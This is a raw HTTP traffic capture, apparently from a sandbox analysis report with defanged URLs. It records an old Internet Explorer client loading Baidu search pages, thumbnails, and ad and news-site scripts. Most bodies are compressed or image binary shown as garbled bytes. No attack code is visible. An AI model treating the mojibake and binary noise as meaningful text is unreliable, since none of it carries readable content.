Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t10.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:55 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: f6ed61310e214549a09cd93b53f0a02a

Content-Length: 2424

Date: Thu, 16 Apr 2015 14:10:55 GMT

Server: lighttpd
......JFIF.............C..............................................
!........."$".$.......C...............................................
........................K.K.."........................................
.4.........................!...1A"Q.2aq..#..Br...%R...................
............ .......................!.1AQ".............?.L....$i.;.u"l
......5.R..d3DF.].ly.Ui............t1.gY.yFQ.TUV.1......}....i..#*...S
.fN....e..k.-bG......gu...r.....W.s%.E=9UE'...N. >1]..y..UjF.4(.e..
.....D1 .,q..o.J.Zr.\..29.l..D..DQ.....m....0.............#.....(....D
QB...a{.>.......\fr...y.....K..b...o.}p...6c...MQC.?.L.;.f.]...I...
bv.z..=.....S/...E..)%...;.S.....}].$.|t.....C.E...A.....5IuT7...1....
c.g..f4......,e]G......i...X.....d..c.^...7.2...X...DA.$\.../.N'...`E.
4..[.X.?Kb3 .W)..Z..Db9.R56..so.hK...w-..k.....7.S.....ao.L%<T..d..
..|m.........VH..2.cvOR^a.I....a7.b..r;t.`...Z.v|.e..jV.E1h...T.?6..M.
q.`.....rk....]F..F..f..a.pW.}...L.Q. ....>.X.X_J..U..Vb...ho....S.
?.<x..,.1.-........ .....Z.....I.k..-......c......pr....C....O.....
...<.[.O..{.f.h.z.G.U.k.q~.D.V._V.[....B%).....[..nr.!.>D(3^.=T7
jJ.~x[.;2.....|z.l..R;..#0.OA.g.TR..L:&..6..u<..3N..[C....|IWp.....
....^....2..<}...?.;.X.9.u.....][Wq..Z........V[.CA.E....$6........
..?....l..)..(.....H.K{(.n|ag.p.|PT."[email protected]...;[..*R..$...~.
....A...c.&..ib....$.....9&u.I..i.5h].......`.f....WP.i:.#.RN..o..=.f.
...uT.4T..T.\........P...........^K..^...bOrI...$U........_&...^f.S...
...G.>..L..."K;...J..)K,t..}."....59.A..W.U.$..".Q.........J...<<< skipped >>>

GET /it/u=1288538148,116491288&fm=58 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t10.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:56 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: cd0125d8e7711ed21c061c16c3f1ce7e

Content-Length: 2142

Date: Thu, 16 Apr 2015 14:10:56 GMT

Server: lighttpd
......JFIF.............C..............................................
!........."$".$.......C...............................................
........................K.K.."........................................
.?..........................!.1AQ.."a..#2qr....BR...$3Tb..............
..................................................!..1A.Q..."aq..2S...
............?...k1.;Q....mcS..O..7Y................m.....Z.s.%...G._*?
u..._SUoo...U.....a.....*.<E.....h5..A....$...NOV.c.....4P.}...B~..
(.V.3...mP.......?Z.L.8....x.c..J.....i.....5.e.lZA...5Z......w..?.Y.9
.}...xI.?-VZ>%.....O...._.W.c/.....j..r..i.....j...G.."E.hN..=.....
..1.......HC..:...$Q3Ph[.|F.p!.[.6t$].}[email protected].\ZYGl.
...].-.......W..2....:.t.../y.M....S...#W..;........=......u.......[[.
..R......-...Z..r.....Bm.D....i!Q#.6....../..2.....9~.r.h..J.....b. ..
:..Q.d...$...VI....(.G..4...W..I....^.{{[[email protected]
.........qy..{t.Z.p...P.z...EXW0.v.....6....Bl..k8....(9........v.).%.
.lfN......w.fK$..T\2..Q..z..D..... ..4.DU.2..L....8%.......:.K.Xd...L.
..}u.>..#\.......~...\.p..pMwpT{,..].k`.a...>:...n[g>.R..x8. 
.f....D.K..^xM...............<}..aIrt..($.......p...^... ...<...
t..y%[email protected]....|.Z. ....y.|.}&[.....t..5<..m.n...Vq..Z.. .........
[email protected]%F..=:.. ;K[b.o..0.".3sHI.5lr.....x.....(!
..k....".N...3ct..Z....N.h.E#...`..*.3.8c...I.0.........K.(.}6O.V....2
n.x......[........i..<p$K...#..-......PB.S......G....z...6fG. ....b
|.\..4x..gu...u.3.....0....4.T..&.."[email protected]...%....<<< skipped >>>

GET /gpt/pubads_impl_59.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: partner.googleadservices.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/javascript

Last-Modified: Mon, 13 Apr 2015 16:58:37 GMT

Date: Wed, 15 Apr 2015 13:00:20 GMT

Expires: Thu, 14 Apr 2016 13:00:20 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 34320

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 90617

Alternate-Protocol: 80:quic,p=0.5
......n.....y_...0.?..t.P...M.6...BHB..@.....m...IfI....sf.H.Iz..y.m.4
3.}.....|.....v.].ts.&~..d...s..-..y:..........%..7.].......?....d.{..
...U.......B...9.d9..X. M..#..8.X^..{.D...<l'.Ejs.N.).....y:...!...
-.@W.`...$..\@OB...[..u.J-..d>...^....x......|...`.G.V...F.0^.....i
~w..A.q........-Q.......K9......dT.......*z...Z..,....9..(......(u./w.
.(j..,.5.RN.T.!q....Hy^....bWB.........h........J.K.....!1...NUy.h.8.[
>...u-Y.} .M.y._........GO.~..~3.p ........z.o...?..P...FM>...l.
..01..`gL..z<X.....;y?..l...4..@.....<..F>.=.8g...YV..=.... .
....W-5.d.A....,..p...Y.W[])fL....L......<....N{k]..j......=.......
f8..@t....}.y ..{..D.w...Y.P .......xa.u1.lF..V..o..4L..|.0.l....X...X
\|..PCH;..&M..8..U.|....u..?p..........L..JW..f..NXL.....o.Uy/.M....Li
.S.`.y.OS.C.....Y...q.....;wg.a}.....i..h8.....u^....Z..nx............
4.....7tyQ...C.D...}>............&...~...a.....63,..H.R....%W).8.x/
.........c......S<......Y>.S.EC.p...A.......-o]..`...YN.qVW..^..
F8....B?=..1...oW.l..W. ..{x.yq..-.F.....3k..g...... .3,=...?[).c.^]..
.....X..|Z[.O u_c..<|ZW....Z...>hQy5;K.r.w..4..}...........k...~
o...../......g.O..l..n!W'.c..o.,.t..bt.._..].m.M......waY...0.z.\.T@,.
..4UC.0.y...b|..hpm.w......`"..'~...x.%j;%.....b.5}...v...{.;..l.e5...
....6L. {...=g...y..I:..B....!.Y&...lM.....7>[email protected]|4
....b;.b5..~.....{.k....]4.........f..}..B.....o..;..<.8.u...m..^..
L...Q..:...|>.]5.au.#s...,...3...]7........9np..y...C....9l,:%.u~..
=t..c...=&.8...>....cN.9>......2........d.S2.,..l.'z..^.....<<< skipped >>>

GET /ifeng/sources/inice_v1.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: m1.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Expires: Thu, 16 Apr 2015 14:11:27 GMT

Date: Thu, 16 Apr 2015 14:09:27 GMT

Server: Tengine/1.3.0

Content-Type: application/x-javascript

Transfer-Encoding: chunked

Last-Modified: Thu, 09 Apr 2015 03:13:42 GMT

Cache-Control: max-age=120

Content-Encoding: gzip

Age: 1

X-Via: 1.1 hnlywt61:8107 (Cdn Cache Server V2.0), 1.1 kf50:2 (Cdn Cache Server V2.0)

Connection: keep-alive
da6..............Ko.... .A...dDQ..8.h.p.g# .S....v..9.&.8,.......C.EQ.
@o........b..3...OSJ....`..k..|.....H..a....z.t]4.}2.!......!..b../S.s
......{.Y8I.7:..0..&....`.......fc.....'$$...I2...M..\.....K.../..P...
5.`..}.@..`i%1..Zqs.]n.$..G.....~..6...f{h!d:..........D.....JJ..."Lc.
.....|)...hJI_.(I.X...l. ..J...k.$.&.V.RS......Pb..V....=g3..aN.siq..1
...\....5....Y...2...qC2k<.......I."[email protected](..M...Js..sAB.=$....
..B.....`...`.E..6|...P4...r..g.d.Y`{..W..D..{8".4G.F8..m........ .%.0
OE3N.,.ne.4.NC........C...ph.i..(.(z.r...n....K.M..*LBm..v..e.../.x...
'qn.....0m...x?... .J.8a...............sJ.vBxbd...R..:>=t.,"1^M....
n{H..l5M.xW...]G.@.=XG.P.=\G....777.z......f.^.>=<..m..8...:zvz.
....b6^....g'/..F#....k.y.......*..uB........W...|rz..q8.cFk$B.W......
..fI.I.3Z#dN..b..g,*f...&`.r....S.....}6.#<$.8....]_g|}..sb9.7....'
.....(<$....u.:.0.-..:.%.......Zz.".u......!.4*.ml.{..p......>..
....\..0......zt.q)O.:.p(.....ZA].fh.e?.$i.Ir......*.x.!KK*....Q.h..P.
.M..c.p....U..'`.7.....@.........^.........Hik..c.( .AR..&...U:...`C.J
5.\...hX/r..9... X..,...:......_.ze...!..0.G......|C...&9..1...Ff%...r
....?t.... m.$.R....\..6h.4...Z........;P...f.Y'.T.'...^h].....k....?e
.X]....YL......G,....0.IV.r..O.$....>.<..U......$.!.Q...6......z
...}P....!.....12z..N..n.i.......4.[.\ ...OD....,.. vk...y./.&.P7...W.
/..P.......|..&).7.c.b....5r..)..M.R.S).4...K.R."...*'=../...c....0.t.
ec..,.J.^..e...T.f'g5K. (...\s].(...B'.cZ.i...gg/.................$k.Y
...-.3...V...S$..k).O..Z..0K.Y....a...Pp.3..kKW.`e...Yy.....I.....<<< skipped >>>

GET /it/u=3263161068,3203223156&fm=58 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t10.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:55 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: b91c3075ef4a019a8abd400465355071

Content-Length: 2263

Date: Thu, 16 Apr 2015 14:10:55 GMT

Server: lighttpd
......JFIF.....H.H.....C..............................................
!........."$".$.......C...............................................
........................K.K...........................................
2...........................!1.AQ.2.aq."#Cr.35BS......................
........../.......................!..1Aa"Q..2q....#B................?.
...@(......P..@(......P..@(....d.;}...u..k.... .....<.N.....x......
wY...a<[email protected]^ 1hSiq3.})`.D...:......6.:.......eD
}../2..8.6..;.~h.x.Ea..9&.y...i|.\I.t!_...?...b.h~.....7...K.CK./6....
.@?4.{*..O1k.......;..d.i..7.......c,[email protected].=.Z.2..$(...
P..........(...7../....}[email protected].......)H.=.]..L......$..p:....
...l..p.q....G..R..}b....H.i..>4...sI.(...6.....6.f..R.*.'0Yy.KQ.P|
....._n........|......L.....k.. .).t.C.........L...3.....KdX.l,,qn!...
l.-.w?v........0b8.......[oW .e.....C.I$..YP$h...h....?.,c..z....\a...
Bzd&..n#.m..?....>.....bM."..L}.....h.i!I.I...G......)]>.~...n.&
lt;n.b.. o.N.`.E\.........P.p.....w....... ?:C....Cz...#g.Go.....c.,..
.....[YS....@Sj.......|...:}...ly6.}.....x%....-\....@y........../..m.
..uE...R.<....F.}>.3...0....1Er.......|...7.j.......?..b...y2.&@
nJ..:..Z.."..~..`./t......k......7.....h.k..&46.......$%;'....`.@s.]g:
.U..m.,f.m...}...Q..R.ky@vPJN..}.*....3v...s.p./.\......_.....s..gv...
[......z.5RW...9...yo..R`.RWe./R..n.2i.J.:9.,.s..Q.r2.....u..nz..^e..m
........|....<...=f.C.PsX.n.g....o..y6..An..Ik....!^^.mZ..N...ZYq :
.i...S.>.._=.i.9...Y...t.y....O.Q..Eo.....)8.;=..w.g66.{.a..i..<<< skipped >>>

GET /s?wd=å—äº¬åŽæ‰¬å¤ªé˜³èƒ½ç»´ä¿® HTTP/1.1

User-Agent: Internet Explorer

Host: VVV.baidu.com


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:13 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Set-Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BIDUPSID=8C833062B6F97482CA56473B4B36B66F; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BD_CK_SAM=1;path=/

Set-Cookie: BDSVRTM=175; path=/

Set-Cookie: H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; path=/; domain=.baidu.com

P3P: CP=" OTI DSP COR IVA OUR IND COM "

Cache-Control: private

Cxy_all: baidu 9a92e15ebdbc324fb792b479f39dde19

X-Powered-By: HPHP

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

BDPAGETYPE: 3

BDQID: 0xc27f20810001a6fd

BDUSERID: 0
373e..<!DOCTYPE html><!--STATUS OK--><html><head&
gt;<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
;<meta http-equiv="content-type" content="text/html;charset=utf-8"&
gt;<meta content="always" name="referrer"><title>.........
.................._............</title><style data-for="resul
t"  id="css_newi_result">body{color:#333;background:#fff;padding:6p
x 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{fo
nt-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-st
yle:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-b
ox;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{borde
r:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}
a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m
,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}.c{color:#
77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13
{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/
cache/static/global/img/icons_2df80e9d.png);background-repeat:no-repea
t;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/glob
al/img/icons_b5457670.gif);background-repeat:no-repeat}.bg_tuiguang_br
owser{width:16px;height:16px;background-position:-600px 0;display:inli
ne-block;vertical-align:text-bottom;font-style:normal;overflow:hidden;
margin-right:5px}..bg_tuiguang_browser_big{width:56px;height:56px;posi
tion:absolute;left:10px;top:10px;background-position:-600px -24px}<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; BD_CK_SAM=1; BDSVRTM=175


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:16 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu 67ccdef43083557c671260226f905bc2

Expires: Thu, 16 Apr 2015 14:09:23 GMT

X-Powered-By: HPHP

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

BDPAGETYPE: 1

BDQID: 0xd53f9b580001b063

BDUSERID: 0

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; path=/; domain=.baidu.com

Content-Encoding: gzip
6129..............{.cIv...D.;`P..U=x?.U.F.zzzv....{...^..pQu..Z\..{j*.
.0%Q.L)hKA......?l...az..".Yf.... .wN....7/.z....b...7.y.....o........
...f>.w..j....O?yR...V.....gq4.ww.o".....O....<^.6.bS..Z......7.
.M.*....u.o....zT.....O.T....h..fv#....MNc].4....Wi..........z..Ql.,^.
..lP.,....l.g.......z...&....k...\....U.d..q..k.o.f.f.u .....9.Q~U7.f.
......W?../...../........?.............w..n].y.n.y5.K.b......r..L.Yi:T
... UF.....89=...........<^Og....~..,.....j../W.4.$.E....?.O....<
;YT...../W.d.,N...f..S'..'...h....c.z.>..y...o^.M7...kT.`z.F.r...'.
^..l.".l.xF'.h}.,...M.Dw.8....%.I..n/.U.^.........l.....R.N..=..Q4~q.^
n....t:...Ue.\. .Ye.\..OdY...Y.n..a..r..J\eo:....fri-.,.n.....h....~.*
../g.u...._E.hL...M..W..J..V.yt.....>[email protected].....(...o=.
.I.......Oj.......u....f&.N..v..n..;.5j....&7.l..m.8......` .p....J...
........'.$]..W.d...WG........\4...}P.xBpa.q=.dx.&.T].a..^..:.%.2..5^.
.?....r:.....cR........].Iz.|.=.....k.*A.epIeo......7Z....$...9.6.....
[email protected]\.,/...ml...p;G........T..=_/...b..MZ....V\......{..RT
...Jm.YT.f/.#V.....$.J........]..A...b..A...........%.A....9.C.AF{....
.....V.`...c.?..:(.0'.I.'4J....d.][email protected]$K...............D....,.%x2.'.
ItI.s'O.3.........-Y.v.......U...FpP..O.....a...z....0..g.....L7....P.
&\..U...T..^...... ..txxH.K.H..z.<]j4m..Z......;?...q...........E..
...-..i.B......A..[....d.V.....k.51.....0..B..&..k...1.C.. c...h...LJ{
G.....ZGM...I[.:..Si..d."|..m-. .1.h.y...9...v..:T=WS......}....r..9.V
.q...f.zQ.7>r.W'..F}.t...]M..r.>..3x.xMs.Pq....hG...q....d..<<< skipped >>>

GET /img/bd_logo1.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; BD_CK_SAM=1; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:06 GMT

Server: Apache

Last-Modified: Wed, 03 Sep 2014 10:00:27 GMT

ETag: "1ec5-502264e2ae4c0"

Accept-Ranges: bytes

Content-Length: 7877

Cache-Control: max-age=315360000

Expires: Sun, 13 Apr 2025 14:10:06 GMT

Connection: Keep-Alive

Content-Type: image/png
.PNG........IHDR................8....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; BD_CK_SAM=1; BD_HOME=0; BD_UPN=1121314151; ISSW=1


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:13 GMT

Server: Apache

Last-Modified: Tue, 26 Feb 2013 07:44:26 GMT

ETag: "1636-4d69bd3a62a80"

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Content-Length: 1092

Connection: Keep-Alive

Content-Type: image/x-icon
...........X.hSW......;.Z;.#....N.)2..!... ..C...(..@[email protected]|0 >
..(". ...`....mc......6m<...MLnnz.&.0.....9.|...?..P.z!.....L...Q..
R...X..y9.k.Qa...~k..p.$D._C..r......#h<..:...-.P...........55.~.6.
n..-.n...............h...b.f4.......QW..C....o..~.P..T......!.j9..W.._
.g.-h...O........7...-B.g....ut4.#.f%j..F,.B..q.N.@.._.%^...U....I.0&l
t;.\\...p..y....?...H.....l....\n.....-}z\...K.,uZ.zc.90u.._..1..V.l..
>.....%c|c....x.#.z....FQ.M.>d.....o....h.R.=Jy;.g.}U..J.H.....E
..'....!.o.8.......}..u._...Dt.K......qIpK..=.r.....g:x...<.%....o.
M.....s...m-yMG..S..rG7..VK......$_..[7i.y.{..K.........j..9.Kn/.w.\..
.{.....=.......R#e./.V...6.z.b7......-5\N....O........,..R.......7~...
1.[.....x.q.l..{.Fu../r..\.....R...........CK_.5?.[z.4......:.|.'..<
;.=....\..-=..>....f..W~'..^..cN..'#7...EH....._....GK.$....a.6....
.-}Xb...... ...%........q....S..._....n._5.]W.l@;H..'....fH...;W......
.o..>...{...7).3..y...%.....\.......X..Jo..q...P....a.@. x.{.i.W[.:
v$m?.cw......L.N3.&....w.g.)..(Ny.....Lw......o......S......5......T..
...#Q..G.j.|.....&.m.^O..p..K.....f..!...7z.d.."?..79..K..k........96.
..HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:10:13 GMT..Server: Apache
..Last-Modified: Tue, 26 Feb 2013 07:44:26 GMT..ETag: "1636-4d69bd3a62
a80"..Accept-Ranges: bytes..Vary: Accept-Encoding,User-Agent..Content-
Encoding: gzip..Content-Length: 1092..Connection: Keep-Alive..Content-
Type: image/x-icon.............X.hSW......;.Z;.#....N.)2..!... ..C...(
..@[email protected]|0 >..(". ...`....mc......6m<...MLnnz.&.0.....9<<< skipped >>>

GET /cache/fpid/ielib_0108.js HTTP/1.1

x-requested-with: XMLHttpRequest

Accept-Language: en-us

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12; BD_CK_SAM=1; BD_HOME=0; BD_UPN=1121314151; ISSW=1; H_PS_BBANNER=1; H_PS_645EC=3c70RzuHf3OnguuWgstPA6+cKl7trAD7CLhsdbMb/ukLv2VuYggcyzNSbIA


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:48 GMT

Server: Apache

Last-Modified: Tue, 27 Jan 2015 06:20:20 GMT

ETag: "ad20-50d9c3fccd100"

Accept-Ranges: bytes

Cache-Control: max-age=315360000

Expires: Sun, 13 Apr 2025 14:10:48 GMT

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Content-Length: 22164

Connection: Keep-Alive

Content-Type: application/javascript
............{....-..>..;W&B4U..*R.N..bg.$..I..J~ ....2II~H...Z....)
Y.....dcww=.c.]...g.....:..8}..........359...:>..O?.{..N.WGg.......
v..zuq.p}q.....w..6._.v.5..O..............f;....W...v\=8....r...O...-.
......./..;.....|2{.|1.[.}...}..f.o....w..[.G.......W....5{.T....9..O.
...|..y....O.&...dy=..[.?.k<..Z...}...kO.>..:...o....Z=or|..9Zy.
....-&..>..m)..n.\..........m..7..~..........x....{6...t4..,d....jo
q3e............=[,....#.=.)m..u.i.?_,.F"..1.O.#.....?_.....;....,i.>
;.h..5..n.......7W.G./w...N.U..f.1.......[......7_39..6{~J..Sm..'....=
.:...nOO....v/..{l....0N.'/.:X....N........&?L.........([email protected][...
